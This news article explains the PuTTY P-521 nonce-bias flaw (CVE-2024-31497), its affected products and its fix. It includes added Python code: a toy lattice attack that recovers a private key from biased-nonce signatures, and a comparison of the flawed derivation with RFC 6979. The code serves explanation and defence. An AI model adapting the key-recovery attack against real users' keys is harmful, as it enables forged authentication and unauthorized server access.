Cyber security news for all


    Widely-Utilized PuTTY SSH Client Vulnerable to Key Recovery Exploit

    The maintainers of the PuTTY Secure Shell (SSH) and Telnet client have warned users of a critical vulnerability affecting versions 0.68 through 0.80. The flaw can lead to the complete recovery of NIST P-521 (ecdsa-sha2-nistp521) private keys.

    The vulnerability, designated as CVE-2024-31497, was discovered by researchers Fabian Bäumer and Marcus Brinkmann from Ruhr University Bochum.

    The PuTTY project's advisory describes the impact as compromise of the private key: with the public key and a few dozen signed messages, an attacker can gather enough information to recover the private key and then forge signatures as if they were the legitimate user, potentially gaining unauthorized access to any server that authenticates with that key.

    To obtain the necessary signatures, however, an attacker would first need to compromise a server on which the key is used for authentication.

    Bäumer explained on the Open Source Software Security (oss-sec) mailing list that the flaw is biased generation of ECDSA nonces: the first 9 bits of every nonce are zero, and that leak is large enough for the private key to be recovered from roughly 60 signatures using lattice-based techniques (the hidden number problem). The bias is structural rather than random: the nonce was derived deterministically from a 512-bit hash output, while P-521's group order is 521 bits long, so the top 9 bits could never be set.
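    To show why 9 known-zero bits per nonce is fatal, the Python below is a scaled-down version of the lattice recovery described above. It is example code added for this page, not PuTTY's or the researchers' code, and it rests on several simplifying assumptions: the group order is a 31-bit toy prime instead of P-521's 521-bit order; the (r, s) values are simulated with no curve arithmetic (r is a hash standing in for the x-coordinate of k·G, which the attack never inspects); the nonce derivation only mimics the 9-bit shortfall; and a textbook LLL replaces the tuned lattice tooling a real attack would use. Under those assumptions a dozen signatures suffice here; at 521 bits the advisory's figure of about 60 applies.

```python
"""Toy hidden-number-problem (lattice) recovery of an ECDSA-style private key from
signatures whose nonces have their top 9 bits fixed to zero. Added example, not
PuTTY's code: a 31-bit toy group order stands in for P-521's 521-bit order, and the
(r, s) values are simulated without curve arithmetic."""
import hashlib
from fractions import Fraction

N = 2**31 - 1                                  # toy prime group order (stand-in)
BIAS_BITS = 9                                  # the flaw: nonces are 9 bits too narrow
K_BOUND = 1 << (N.bit_length() - BIAS_BITS)    # hence every nonce satisfies 0 < k < K_BOUND


def biased_nonce(priv, msg):
    """Analogue of the flawed derivation: a hash-derived nonce 9 bits narrower than N."""
    digest = hashlib.sha512(priv.to_bytes(8, "big") + msg).digest()
    k = int.from_bytes(digest, "big") >> (512 - (N.bit_length() - BIAS_BITS))
    return k or 1


def sign(priv, msg):
    """Simulated ECDSA: s = k^-1 (h + r*d) mod N. With no curve, r is a hash of k
    standing in for the x-coordinate of k*G; the attack never looks at r's origin."""
    h = int.from_bytes(hashlib.sha256(msg).digest(), "big") % N
    k = biased_nonce(priv, msg)
    r = int.from_bytes(hashlib.sha256(b"x(kG):" + k.to_bytes(8, "big")).digest(), "big") % N
    s = pow(k, -1, N) * (h + r * priv) % N
    return h, r, s


def lll_reduce(basis, delta=Fraction(99, 100)):
    """Textbook LLL (Cohen, Alg. 2.6.3) with exact rational Gram-Schmidt bookkeeping."""
    b = [list(row) for row in basis]
    n = len(b)
    def dot(u, v):
        return sum(x * y for x, y in zip(u, v))
    mu = [[Fraction(0)] * n for _ in range(n)]  # Gram-Schmidt coefficients
    B = [Fraction(0)] * n                        # squared norms of the GS vectors
    for i in range(n):
        for j in range(i):
            mu[i][j] = (Fraction(dot(b[i], b[j]))
                        - sum(mu[j][l] * mu[i][l] * B[l] for l in range(j))) / B[j]
        B[i] = Fraction(dot(b[i], b[i])) - sum(mu[i][l] ** 2 * B[l] for l in range(i))
    k = 1
    while k < n:
        for j in range(k - 1, -1, -1):           # size-reduce b[k] against b[j]
            q = round(mu[k][j])
            if q:
                b[k] = [x - q * y for x, y in zip(b[k], b[j])]
                for l in range(j):
                    mu[k][l] -= q * mu[j][l]
                mu[k][j] -= q
        if B[k] >= (delta - mu[k][k - 1] ** 2) * B[k - 1]:   # Lovasz condition holds
            k += 1
            continue
        b[k], b[k - 1] = b[k - 1], b[k]          # swap, then patch mu and B in place
        for j in range(k - 1):
            mu[k][j], mu[k - 1][j] = mu[k - 1][j], mu[k][j]
        m = mu[k][k - 1]
        B_new = B[k] + m * m * B[k - 1]
        mu[k][k - 1] = m * B[k - 1] / B_new
        B[k] = B[k - 1] * B[k] / B_new
        B[k - 1] = B_new
        for i in range(k + 1, n):
            t = mu[i][k]
            mu[i][k] = mu[i][k - 1] - m * t
            mu[i][k - 1] = t + mu[k][k - 1] * mu[i][k]
        k = max(k - 1, 1)
    return b


def recover_key(sigs):
    """Attacker side. Each signature gives k_i = a_i + b_i*d (mod N) with a_i = h_i/s_i
    and b_i = r_i/s_i. Eliminating d with the first signature leaves k_i = u_i + t_i*k_1
    (mod N), so (k_2..k_m, k_1, K_BOUND) is an unusually short lattice vector."""
    a = [h * pow(s, -1, N) % N for h, _, s in sigs]
    b = [r * pow(s, -1, N) % N for _, r, s in sigs]
    inv_b1 = pow(b[0], -1, N)
    t = [bi * inv_b1 % N for bi in b[1:]]
    u = [(ai - ti * a[0]) % N for ai, ti in zip(a[1:], t)]
    m = len(t)
    basis = [[N if c == i else 0 for c in range(m + 2)] for i in range(m)]
    basis.append(t + [1, 0])
    basis.append(u + [0, K_BOUND])
    for row in lll_reduce(basis):
        if abs(row[-1]) != K_BOUND:
            continue
        k1 = (row[-2] if row[-1] > 0 else -row[-2]) % N
        d = (k1 - a[0]) * inv_b1 % N
        if all((ai + bi * d) % N < K_BOUND for ai, bi in zip(a, b)):  # confirm candidate
            return d
    return None


def demo(priv=0x1F2E3D4C, num_sigs=12):
    """Sign constructed messages with the biased nonce, then recover priv from them."""
    sigs = [sign(priv, f"constructed message {i}".encode()) for i in range(num_sigs)]
    return recover_key(sigs)
```

    Calling demo() returns the private key 0x1F2E3D4C from twelve signatures alone; recover_key verifies a candidate by checking that every implied nonce really is below K_BOUND, so a lattice that did not contain the key cannot produce a false positive. Note that nothing in the attack depends on how the nonce was biased, only on the fact that each one lies in a known small range.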

    The impacted products include not only PuTTY itself but also other software that bundles vulnerable versions of its code:

    • FileZilla (versions 3.24.1 to 3.66.5)
    • WinSCP (versions 5.9.5 to 6.3.2)
    • TortoiseGit (versions up to 2.15.0)
    • TortoiseSVN (versions 1.10.0 to 1.14.6)

    Following responsible disclosure, the issue has been addressed in PuTTY 0.81, FileZilla 3.67.0, WinSCP 6.3.3, and TortoiseGit. Users of TortoiseSVN are advised to use Plink from the latest PuTTY 0.81 release when accessing an SVN repository via SSH until a patched TortoiseSVN is available.

    The fix switches nonce generation to the deterministic RFC 6979 method for all DSA and ECDSA key types, abandoning the previous derivation. Like RFC 6979, the former approach avoided the need for high-quality randomness at signing time, but because it produced a value only 512 bits wide it yielded biased nonces for P-521's 521-bit group order.
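    To make the root cause and the fix concrete, the added Python below (example code written for this page, not PuTTY's implementation) derives nonces two ways for a 521-bit group order: a single 512-bit SHA-512 output reduced mod q, the pre-0.81 style, and RFC 6979's HMAC-based procedure. Assumptions: q is the Mersenne prime 2**521 - 1, a stand-in with the same bit length as the P-521 order rather than the real order; the exact byte layout PuTTY hashed is not reproduced; the private key and messages are constructed. The RFC 6979 routine is written generically in q and the hash function so that it can be checked against the RFC's Appendix A.1 test vector.

```python
"""Nonce derivation for a 521-bit group order, two ways: a 512-bit hash reduced
mod q (the pre-0.81 style, whose top 9 bits are always zero) beside RFC 6979.
Added example, not PuTTY's code. Q is a 521-bit stand-in (the Mersenne prime
2**521 - 1), not the real P-521 order, and PuTTY's exact hash input layout is
not reproduced; key and messages are constructed."""
import hashlib
import hmac

Q = 2**521 - 1   # 521-bit stand-in for the P-521 group order


def int2octets(x, q):
    """RFC 6979 2.3.3: big-endian x, padded to rlen = 8*ceil(qlen/8) bits."""
    return x.to_bytes((q.bit_length() + 7) // 8, "big")


def bits2int(b, q):
    """RFC 6979 2.3.2: keep only the leftmost qlen bits of the bit string."""
    v = int.from_bytes(b, "big")
    excess = 8 * len(b) - q.bit_length()
    return v >> excess if excess > 0 else v


def bits2octets(b, q):
    """RFC 6979 2.3.4: bits2int, reduce mod q, then int2octets."""
    return int2octets(bits2int(b, q) % q, q)


def flawed_nonce(priv, msg, q=Q):
    """One SHA-512 output reduced mod q. For a 521-bit q the reduction does
    nothing, so k < 2**512 and its top 9 bits are always zero."""
    k = int.from_bytes(hashlib.sha512(int2octets(priv, q) + msg).digest(), "big") % q
    return k or 1


def rfc6979_nonce(priv, msg, q=Q, hashname="sha512"):
    """RFC 6979 section 3.2: HMAC_DRBG-style k from (priv, H(msg)); draws enough
    HMAC output to cover qlen bits and retries until 0 < k < q."""
    h1 = hashlib.new(hashname, msg).digest()
    V, K = b"\x01" * len(h1), b"\x00" * len(h1)
    seed = int2octets(priv, q) + bits2octets(h1, q)
    K = hmac.new(K, V + b"\x00" + seed, hashname).digest()
    V = hmac.new(K, V, hashname).digest()
    K = hmac.new(K, V + b"\x01" + seed, hashname).digest()
    V = hmac.new(K, V, hashname).digest()
    while True:
        T = b""
        while 8 * len(T) < q.bit_length():
            V = hmac.new(K, V, hashname).digest()
            T += V
        k = bits2int(T, q)
        if 1 <= k < q:
            return k
        K = hmac.new(K, V + b"\x00", hashname).digest()   # candidate rejected: step h.3
        V = hmac.new(K, V, hashname).digest()


def leading_zero_bits(k, q):
    """Number of zero bits at the top of k, measured against q's width."""
    return q.bit_length() - k.bit_length()


def compare_bias(priv, messages, q=Q):
    """Smallest leading-zero count over the messages: (flawed, RFC 6979).
    For a 521-bit q the flawed scheme can never report less than 9."""
    flawed = min(leading_zero_bits(flawed_nonce(priv, m, q), q) for m in messages)
    fixed = min(leading_zero_bits(rfc6979_nonce(priv, m, q), q) for m in messages)
    return flawed, fixed


PRIV = int.from_bytes(hashlib.sha512(b"constructed demo key").digest(), "big") % Q
MESSAGES = [f"constructed message {i}".encode() for i in range(64)]
```

    compare_bias(PRIV, MESSAGES) reports at least 9 for the flawed scheme on every run, because no 512-bit value can have more than 512 significant bits, while RFC 6979 concatenates two 512-bit HMAC blocks and keeps the leftmost 521 bits, so about half of its nonces use the full width and the minimum over 64 messages is 0. Both derivations are deterministic, which is why the old one looked safe: the problem was never randomness quality but the width of the value being reduced.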

    Any NIST P-521 ECDSA key that has been used with an affected component should be treated as compromised: generate a replacement and revoke the old key by removing its public half from authorized_keys files and the equivalent in other SSH servers.
